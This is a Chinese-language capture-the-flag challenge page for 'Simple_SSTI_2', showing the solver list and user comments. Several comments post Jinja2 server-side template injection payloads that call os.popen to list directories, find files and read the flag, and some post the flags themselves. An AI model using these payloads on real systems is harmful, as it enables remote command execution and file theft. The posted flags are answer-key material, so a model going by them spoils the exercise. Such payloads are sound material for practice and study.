Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
16396
提 示:
描 述:
Simple_SSTI_2
评分(15)
解题动态
一只小白鲸 攻破了该题 1天前
Wu. 攻破了该题 3天前
tiger1cyd 攻破了该题 3天前
qq1002517 攻破了该题 4天前
乱来小木 攻破了该题 4天前
yttitan 攻破了该题 5天前
hdcc1 攻破了该题 5天前
WYYYYTT 攻破了该题 9天前
有点易斯但不多 攻破了该题 10天前
1907104474 攻破了该题 10天前
xiaoxiaojiangshi 攻破了该题 11天前
scv 攻破了该题 11天前
flag大王 攻破了该题 12天前
藏在云层里的羊 攻破了该题 13天前
xyqsin 攻破了该题 14天前
一定要做这些吗 攻破了该题 17天前
爱意藏入虚空 攻破了该题 17天前
chenzhong 攻破了该题 19天前
kiritoldws 攻破了该题 20天前
评论
3166235571 1年前
举报
是这个flag{561f38d2a44d42ca8847575a2e144b2b} so easy
2280443298 1年前
举报
{{config.__class__.__init__.__globals__['os'].popen('find / -name flag').read()}} {{config.__class__.__init__.__globals__['os'].popen('cat /app/flag').read()}}
zhenbuhuiweb 1年前
举报
flag{d15e0ca95ddb50b992109b24c82cfe5a}
ssln 2年前
举报
114.67.175.224:12792/?flag={{config.__class__.__init__.__globals__['os'].popen('ls').read()}} 看不懂,应该是什么固定格式,修改“ls”即可执行命令
210470qq 2年前
举报
flag{43b52fa732d6f8ccbfacea9e989ac07b}
songci 2年前
举报
ssti模板注入,尝试获取OS module进行命令执行或文件读取,使用init.globals来看看有没有os module或者其他的可以读写文件的,爆破获取300存在:{{"".__class__.__mro__[1].__subclasses__()[300].__init__.__globals__}},进行命令执行获取flag:?flag={{""
Mirabelle 2年前
举报
?flag={{config.__class__.__init__.__globals__['os'].popen('ls').read()}}; ?flag={{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}
ZeronKR1212 2年前
举报
怎么做啊,哥哥们
kimizu 2年前
举报
SSTI模板注入,先尝试搜索有没有flag文件,发现有,cat以下就行 {{config.__class__.__init__.__globals__['os'].popen('find / -name flag').read()}} {{config.__class__.__init__.__globals__['os'].popen('cat /app/flag').read()}}
3347665154 2年前
举报
flag{a0a8ab35c083003f4bb44c7920b69bd1}